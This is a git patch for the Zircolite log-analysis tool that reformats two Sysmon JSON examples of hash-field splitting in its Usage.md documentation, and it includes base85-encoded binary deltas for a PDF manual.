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 Date: Fri, 5 May 2023 16:28:17 +0200 Subject: [PATCH 3/3] Update docs --- docs/Usage.md | 24 ++++++++++++------------ docs/Zircolite_manual.pdf | Bin 669742 -> 669755 bytes 2 files changed, 12 insertions(+), 12 deletions(-) diff --git a/docs/Usage.md b/docs/Usage.md index e09d146..7f7f5da 100644 --- a/docs/Usage.md +++ b/docs/Usage.md 
@@ -245,10 +245,10 @@ Be careful when using aliases because the data is stored multiple times. For example, let's say we have this Sysmon event log : ```json - { - "Hashes": "SHA1=XX,MD5=X,SHA256=XXX,IMPHASH=XXXX", - "EventID": 1 - } +{ + "Hashes": "SHA1=XX,MD5=X,SHA256=XXX,IMPHASH=XXXX", + "EventID": 1 +} ``` With the following configuration, Zircolite will split the `hashes` field like this : @@ -268,14 +268,14 @@ With the following configuration, Zircolite will split the `hashes` field like t The final event log used to apply Sigma rules will look like this : ```json - { - "SHA1": "F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054", - "MD5": "04029E121A0CFA5991749937DD22A1D9", - "SHA256": "9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F", - "IMPHASH": "7C955A0ABC747F57CCC4324480737EF7", - "Hashes": "SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7", - "EventID": 1 - } +{ + "SHA1": "F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054", + "MD5": "04029E121A0CFA5991749937DD22A1D9", + "SHA256": "9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F", + "IMPHASH": "7C955A0ABC747F57CCC4324480737EF7", + "Hashes": "SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7", + "EventID": 1 +} ``` --- 
diff --git a/docs/Zircolite_manual.pdf b/docs/Zircolite_manual.pdf index 2dd5492af00fdecae579e424cfff548a904e91c9..2879dfe40b7e33587400434ae13e147f45094ede 100644 GIT binary patch delta 11291 zcmai)Q*b80wzem>ZD(S8V%s(*b|%&r>x*sMwr$%J+vY#}?3;70{)@M}x~qF#tY=ks zyL)CFZRSU-j;9%wFhyCO1WNKs!>%M-7FBMJRa(kt*2o-VE{UewMyB6w3&UFW# zsJ*?|r4I3KXvYm4r;nbs!@78ltS^MJBqVLq*Z_O+bR~gD>O~$P1gCtcR0|4;)RS~ z=BcLYY5MV}~1lmCw-00IcmPi-ESalf%nEM1!#3YYjw z=u?+i2xTgE8~COLk#t|X8)?^N=H$VH7aO7IK{mN?L}G@&ml!sGA3M3Gkvd`stnB=G zmo5k$zDf452{>+9g*ps)%xb&E%A}VGFHX~nUr#^sT)q`n-9^}Jv(_WM?RVLweUy8d zu)kyiaN}X18$(L>EO)n5AYwt*Jq+GbJ#pM=zs+~A;@J}gXV+!bU5L|#5(gO5;TeQ9 zjP7DqJ~RsHM?+LGh^Gd1$%uaXWD|Er8E$S#`ZV^8i>(^0X%IvjSHiM@f?gt@>`r7v z@)kCk2n!lmtZjYXr#N_w+U)7<>$#0OMQuiHcV6zr^vE$6?Ns%tqYnIAi#;uo%)AFt>2c8mV z2c+A7j#oCnTh@;(8d}4WKg_cHoD9Uf-0Hj`U17lnKwEAR zs&eOxjM`D)vh>>ZB}ycmm;LPszs$%Ue${!s+T!Y-&XdGQwS$k!dEak^wp7>`jT-3dXgI$!Dvf{ zNletL8f6D>qIsBO`zaKwd=c`;aI{gcbk!s%muC`h4Ml7DZ@I-|bz6ozK(0UNvQcud zk!mGQl+CfBzkV~CdA4lE^Vw0##bH@niz8@%kBAcT=UR#73QFL@#RBMr1xUK+Fv+2F zhW8;!yru*a3->FIEuvmBr`=Pz{qvJPLT0GUGP^_N9CV;rtU@ z8)2pPgjC$H#xnh*fO41yfKugeNoF{?MubJH>cUFb39Y5J6qx`(*ILrIjUA%NK{GrN ztLqtB3p`A_a$|nxgYgdgo4Dk~WQ^Si3khwVzgD{yI;1ZqtGcS^Dt;C#G1+db7F%2; z$>NPF)+prX)`kc+qsHXt6V7922yJanyH~()F1PD4lEt-*3buab!E* z$M-YRHKHBxCYM@#50>y~=dRIEHppzOcUINxOn(z=Hc4VmY9%UG!q!rb;8wo*EFr>U z0Qrun<<(}9543c&Cl6C!^P=~=J%Z3kT2f@Ng+n+>k)sL5OHHmbn7Ae7e?cUfw4_s8 zC&3u4i`qfQ@Y%%&a4pZe(XIBOV^0T~I7DY+%9zU89Gl24F{N#EKg^sqxooS_m!{5k zjI*U}U>VL2An4@c=4bfVbO+O@>~NNo zim^-i6zAH`XR`yXbmJ*_lCR}Cr_b2MvnLXL%aapaVBA!;8zB4H-HBeTdzwENUw!uL zvwyKW<`v(1=*`P&{o-rkW8SPF*Ahy!Ukve{SViI0I6k7u3j_-t3V$)WRD+k2ibK%V z3gkueG2RE@H7l>h^Ko7#0QjT|E-gMbD-D~J2hse8>xPZH@8Ld8!}^_NS?|>Az-&}o zwRs=FVy=dRv8+qzRlOwKdfdLvo+WQNo7=7l%)fec{3W6tz9rZal;@#q7R8fOPAMUx z+cbKn@@`vS_C)q!>PggPO~m1pU8E7q6k-DR6)$wC!IZ6{;nKeRLwt%#Jf}1W42$r5INZg+fV<) zBY38m8@n^vRQN|})17<@dMd5X!Ect;9aflvRm1V>pv~F&k9fs0yW62H&ztxV**19D zElQG30HAb0OorRs0H9Qz+1MV*`C@=Wh8hC67$8NO%^)`I#PIX9n$5_fGs4jVV%es= 
zn(W~-r_dkv{hAb;=o-*1(wGqk9|nt;*pQdi2H;pPO*}(csY}0-lKC2zm0!+kONraR zx{26XuFy=jTk1^M!7Kcce6a`ug4l!SMjbxZUHp17ZKGI`{^Gl~t0X?O_78pAOqBx& zc^G7It0FhC_bB98LnY6g;xN$Q63{QSxe{7Qs!^Zubwt4YzL^*99_6Qc9gX&8snl}P za^Y2OIC#*#(A{3#KpOl^cJL!rK6&HGZ-#Fm2wYgK84<61a92<)U76lOd}GPTTwD?I za27}(8*}KqP!!}walRB6>)3d$&6o!aI3uvLs-JAcCH>jJR*aSfy^6qKP9a5H=eIj+ z8B;5hK(517-FaW;j7>bC;Xg26)UOne^3{o2=8FTPsF`BUQ%So>O!Wlpp2PzY4UuiZ znHzS0^W6LTyfg85pxnGT;D0_9;U0G}u^;oK&}ySGAY7T*w%^l<%VP%dmHY%)-i-Rt z?s^rz)#`Gc*wfk85HA8zu>rZyK$M(*lh)Gc=!v`3+lT;mQ_RqdZ)HZ`An`qr1Mj7L z&b~F)R)T9~C4*<(t2f)fqQj%`!YM43_SI^)zusg>3Gm(4P4--b-I78h7t>}1r1dnU zulqMTJvqjnB`4^S;b_)&?!^ERdyw@PTkg_V^O4#ZQwQ&?^P8S4KaTV}Aeq`YA-bZM zR2=QnyXX_#uN(?cW%XvlVj_#?#6{s*2t+f)9sP#inIa4D^nN7S%VB-D19RJ#1 z?^a_DC_v4aoVXNU6#)870c*$J;(=!jws_vwbv?_fp7;e{1YMMtV7eaLIuGT@u9=P6 z+)NX_LRo&@x8Ax2Z^IDN1N}E$`8Rn_Mk;C!=v9%AuqGfcnjD7h0m3@hUPL0=id#L0 z`Q{;~RTC9EsINBXxY2my5{*jzW6nHYbid0@)6DLBP+v}wz9Gb%!g~WDL_;A&LH-H! zpTPbJ{GTBH3G$zy{t3DTLKH@f8erWoh&*)titc4YO|iz_VJ!rTODp-U**Nq^RveEh zqjorOr+cj15(z={#njb&o7a5LyGysD9qTsKeuCg}PqSlup{VOEe$ZdO30R1#ruQWK zx5XxcA>zIz--{6!_15?Ou6|9Rv)gu~*g=_(Vg1kJ%VS%-xT^Eu+>DNdFo3xxrDLP0 z#OyM8_ngCQuE50LvtnN^6oMNRT)z}$>9WI$V3TP; z4z9jV_4MH5Zf9@~ZaKZ%AUHiHpJr>t-%g(+!2OC5wL}$-5@jUz4B0%F&3?p(t)$1J zFZNokgb~hgTNS})mG+A3e$~y_5B;!R#FX1VFlZ^Cb}&?c|Ks@d67{S%1d+vdK53uo ziokVDN-^(SfHIOHSn~CnOX)oJai$L+FuP&y$3g%>im!2COSgfCO zIpun-sXhzKK3qA~J{XfaTx^%*QgU0WSV|u?(WabfmkUOsE&(~Cw54-*ntvNYS(ZbZj2Ty`6uV|18kCdC7FN8YCblO<|C zo^UxMP1imIZ^eA63N=Fv)fd%z&xFx=U8!ro+agyeMl0l9xZF%J-s<^+#*8_5Wg1rD zXPi*i-+DehhU;2<9y=~ZZVrr~a{yC!zj4aK4n)r-%Ycc+qQ#2hg%(5lkd7s2j^@n) z&gLL|P7I+OnSu2|d~k7F;iK78BogF2tO|t|@`ck|BICqMgz;8!iPV9KLa*>h){;Ee zB&XP^5qRfH$$qSin$KoPWIsFch606G;)+eO?POOFu|n#+=*P6J?xbJ4ZxI z9E*#3AV&mP1c%S}SBz@H`R6!`X-PY#MD&>_%2LxfG1BknJK}gKXHO60vgO5vie*xK zt@3lngZ~Lf2+%LgJ~oVcP3n%`z}l0D$q03HDz)~xRhX>0{&>5laU4ozCx99dlwt|R zR~3~uCPK-OwygfuR`B&Bx>uTVK+}2;dSq`h9h2=koBT-=U6r2DLm-{O z%O&k4HN_KD;!;iZuAU zoIcbdi7#bfrvB0RvE)VnW4imx-S={%KH+x1`MZ>8X9w0&>{0=+`sRw)DLMN7;m{%5 
zz2#P-U%3*8T(QD^XNqgTXQc8h@olR0&c5tx)863jK7(j<=s*yHwDV?%>X=wek{P74 zwDQH0m_#&jby48LD^RA1b)O*KUGeR84IfRQu(ac(+dOgE$rs%u3ufw1M>F^vDf5cI7G&f|&MC9Q*|q0HnYX^)IPkwG=}9C8f}sb$oIv z_&`2)2qTIW8|`R-n7_t}JSABgFW!u+R!^>ZP7l4D3~n9OZlS4zTIKPpN~*Ma+h0*n zMpzuy43hfk4K)kXq|XuDX(&LN|#I zV+OfpVss?wp!8yl$pCAxJ`aJT)r$Qv|KTW%jyj2M(l2}Ky10;QKzDX3**NSIy-cn> zFgce#=$UU8{Yc)oo)>_qXE@7<$jyc7r1*kpH^9*2);=Mifo=QThRP!~PGOAt6EhJa zJ`b^8k@$j^j*SY*BANy!~ zp3K@jwQAUAdt8(Kez0weGHm~AH19?&E}1i?})FB2mkqZ|9EnRyd_D(@%XrUibQ7CKso@c z*sG)+L|a_IsK~RT-|}pv3vNdsTQhlf@aO_?bb+RU-GgQu?A+-j&Lvh3=MS>Deo$PN z5Vn?69kyvEaER*pe`c1lv9-ifl>B~^_xJG&Iw>+Z`8lZtPdedj39+CWCH|4-{amCZ_IKNZVIZ2Bz+~z)=v@z4i<-2%tu!-0=gTp-P~gh&^KiC1nv0a1Mx-qe?{- zqeQW}%TX6`L>EUL1;GAA`NgHqBNNu`jg6Phv(faZr}LyS!ocVwz&2Y~6I1oNE_P1o z+w@g^SzR%_13=$5tpD#hl;R5W6TtqzA360B^?dfs4`#nJ-NQ8#5aBN!2=k0op2dWf&#e8p(D?b~30EJS*#P zWJ*h>69-?1O%}WYJLpqhjud}u0NaS6*DH@^CXHGxMogJ$02%hp>*PFij4TJ&XA4Qu z$%@w}N9)t}`JZHzXbRBZ6@PrJFGb*slep()dY+AF>znw2ef&G^S(jaw49*l=5xo;E z#|)wlMP(<;=oD+hIb#{%TjPVj*QzGT^gbJYdSANJ0N^%=knXSCkw=-%sUw6?EY7IH zg;-ZpF>5Ju0Ted5TtV~@VztcFvEWezL*6kM=wUw5_!RyH7Kp~d%wZU*%ByC?FnDN- z3HWRQQQ=EkMu^&6(s|i*LW(J}rCM%-N_&#bB%$b!i8uMFyA)!46i$k=qa@-<i4vI{#-J4A2LJ1YO>=H>p68`uBkCSxBUh#vg>5uvrt781&2 zf+k|DgciSEz9`l)@YhOeTu@y1a7WT z%Pu{Ov8Q6YMP&(ab6Iw@?XE?XI_Yp8Ktp%sx>b0Ev$(RaA#>CfdGk+|b!I+qg84vV zL=}lNGMEVD1lHMcr9}VbRxqqUj+8tP7)*eUzi?@%Un?jY&8P-4&EN@ZHra5aXe4_Z z51Lub3b8D$5KQ?5g2fRPj9?wvP!LZ1Xxt!t1Pl$#6E$<7v2YFy2N(R2vFwSMQBDMV zozPJFYOb*yT0~FfFcw+5SF+Dy3+GUA3J+1W z{NlggcWTOuO?wtwuUd863#isiqg{ujB^12sl~1X;-92x!3S}`P$eeC;u88h8`HzDy#(&F0 zQN$L}232in@~pDEEHc#c^vNN8KFK_YBC(R+G-N;i*7DV=qTPrZ|90pqvs4Y8ZjPS* z9Kuod;&EMuBU^GcL*MJ+W)D10*)VgrmM{F+D{?RIA<}Qz*nTpqEge2;0k8sVwkQ|N zi@+K?&IM^utCt@idFRXOL-niFvz5P&6W@5-E81z-eHEVXw>zxIT%Jm=y2sPq&L)^X z=EE;aK^bSb^}_aKcji4T;M;}?$8;bT#+R&Et2W6tzJMdl(U(X^C5{ce-suNIu|eD_ zV}(LW{+jRs%7J^xb?E3M0Lnxbu~AfODt4+sWl4ON*>q}ONZVXp777rjYN5R^XjC^6 zE^-Qs@YGo{{2+%7a9?Wtcm!xfZ7Q>La#tHe2@1&|mWieDKz^II?3M7vKKPJL=0cM=ot}&UnuwI#T)g 
z1Sz-}Q~n<`EjB(dA|)VfDYfLVH~?2`8@`&tDs(llpdiv9aLJItTPX8ll4{)H#nr<8 zo}E7wE;?HaxHix-bERAHSNod<6&px}w^0^_k5T;wAGM2Aw7B+jqvFzm>g@AWjqP#r z`9tjfQjj8Q7UU4Re=H+^Hs;Oo&a8>!jn=+IG0&ffLq!gF7ZC3R4+|EPegIrs32jV* z#c1&=^58t_g(#iZiD%zJ3PbrDXX)A558#K#hG9pjGKAg2cK32ntd{l4!}0qUo>0a#1V9al_nRU( zcgarfZ|ia_Nfj}5sE zi+sR0X$Z;ulSwn#mXRw4!XeN@bVL(vAu{v)f6F9G><(I<#Kryv{a(;yYztNR0e7(a z!`Px%9@LfFA9J7yo(qHukvWV~8aU@LZrvDGte!gkH`KpSt4A3c?*RZt$x=zg6dUYo zL22y{?g<^w4vy-`=10y=wGv^1a7__OY_G*H4~iUXBQ3~Fv3C%3#E>Z|t__>%E($jI zgKan1=r;9`4i90N2kOmoc8rzLrI23&Ou$?42V1gu?65;@dM-kHm_t8^MF7N4c6V%i zMRprTVMJJ1%7PFDCNMx>pksf1IB(F8N)GR%JY1vr_!J!Y6bFzygkPpVu)t-c4r*l` z_R>T4dNj^=4wFKv-&^&E!(Fh;gLa58K{z1a><0G}#HYkUz&NvkmF}gR z?vYu+xznZ}-)r=I4J(IPK;qSG8|X89H~oN%;4d43FFoQ%T+0QhOzleToI)yhr3vjj zmrw{4bR)q^m&s2K`jYPH$uD|_P|3Pk&9m12awD}6%kdYl{IHa0OlIBj3Kvs*T4O@% zQWQ85u}XbpL1}SHS7JTu!Um0|P<>bfVWFIzd_)ZKPm`XTe7=WF=Ax^yo9;!l{*-;< zcoQOm)>>s2U!Mig%{G#Vzou1j_1;%j4=sb8Sf+uG1ZO+TZ34vg0ar=<_cIpnu!&yZbJX3x!g9GESOGW88Dg)rbLX5 z3mZss&=EjLxU(W;SX4N1_OWBr>xJKp4HqN+nGpW?DNf?Z-G@S)N>d4(1=Wuh7vaSN z(SWe7N=X`(Jr%gb#z)CA7Ug18>Xs6xMqP}>NsG3~h>6cRw6DwgPA+lNpqXdrK@Nr( zE4x^ia~I35Pv`S@h>9niph>EXS>G=?Le;90_D4W*V>ZolMrAPj*PNE(lIuizV-bgj zlm&x?oT=^5IuN^+?|IbxqFuD8Jt(dw1JvBZqOqyeORxy4J3wQY$_jNM8U8uM_^@oy zgukVNH0vBc(D=|r|4eNOP3^f56wrf}8c=Q?f-BPKip^a%*mXbvSO99f7GC%{X4$_u_OAAX5BAy~Z3+oT?=-BG);kR#z zlJa_)K)TlMy(_+~og3qR@ogHozU&{|nRq>2S~6>iQg}mig%d$@s^U_$!ydb&$qkmv zUOPx*SJ6HZq+gD1Ok9%Y^vWQsdNz*7Qdq{?c<`%YUP})WXJhrZ83^(rw|-j7^C1_1 za+%asRFG)k`s!SwXLkUYRnI08D+oOS#si$|qY<^#9}6C26lRNfki@AXO1 zh=yrUr$b96;}}%Y-N1@^9cl#)Dl@@MG7bK)zamH^>g?*ie;zV8cf+dL`P%yMg;FEw(R1n9>B?Bl)AndxZ*n92!qRKSK~s-+691AosR?>H zv#Y;Y>v%e2OXhezoGy5@!}$cXw^DZ4Fw*(>A>=$!vb-^#55O` z&@k@<1abhoB$_^O3LLPYnPVq@b@PUJvr}I!3L);3O6YQGm0G2TEbZs+NjI0hf4%q~EOu;HZLnBc|OL8!h z!Tf|?VY1W@aUxXDh6ZK3eQq1Dmm7Sr4mdrT`p_RJD|7Jt*d#ch8>n%^QCQjutwHA@ z2ByQ$V<=1b5HZq2>%Ay9AC^$#s^@ePeFe=?JK&%fB}>jHA_j=A&=b|x;tLXfxgDWOqNO-d*bDGJ!rYA=V-Phe#+vMm^pd-~&4 
zx)a$_?)Dsupzm+^0XdZ&R%IlFXu5SyuQ`AYr2CLDg^9s`+8}dR)2b;f>a-f)%Yi8x zNB+)azy$P_&4mA05(W2z<2#W+=3qLEHSikk-(4X7n8(!E8cuD#x!Sroh$!F5>ClA| zQY53Imwx7To!p%>E!!0?0zYT_B@uEpBZtdK-O~Mx!M!Y+ewQ3D*v+;onA+KjvJa?G zAFS{pbh#igFhcS;G@-Df}L3n0>l-uu(-(zzTR!A@mM$2pRl zJR=97(d~GqnsNR7aVg_h45Q*_l^fBO@KlFe%B2niB!ob#|4r!S(}(9LBH&T;BR8rd zDb$?GWblK|mx;5}4SPB@$8JU|8EcTJbMPJwXYvE0@-5if6`k+8+j_Lns|MR1%q=2DNWhgT5=@(Nh2ZE`%yLRfH#002=gw458_$j|G5Y43xsytpt`yz1)c?#6cGGV?E|(Pn>#mR zPC~JW@>{dHHNysGq~Y*lE5nOr_9azz5(DnH-CeFV93%Pq(JOFjWH4rEeuUAh;}2qP!dPgkd9DL^?>UPA69)< z-YqM48RDq6C?>#Sc6SN)8HYM^$C**Gjrnb4FpPvL(CAw!CO6_Fw>_n@w2*#TY``a}dps_rc(B6Ks3Xh=h_F=xPE+5WF)<`kde10hCU1Fpe4ISLhblgoUk|C+ z7y`n-7)|9yO`~EmmRc**#`*6Oq%&b-DI7zJm+g8@78;||0@3t>Ob zls{XV4}_}Vy=A1j@_zStU99o+G&+`3s9_#nT!zF6=TMmo9ZLoNaU_{WVi{%@$KPQz z84VE949%u!4U^V`A4Uc|7*g?^40&o2;Tek91Q}sRN7cb_44JLslQG3#$A-$3i5kJ# 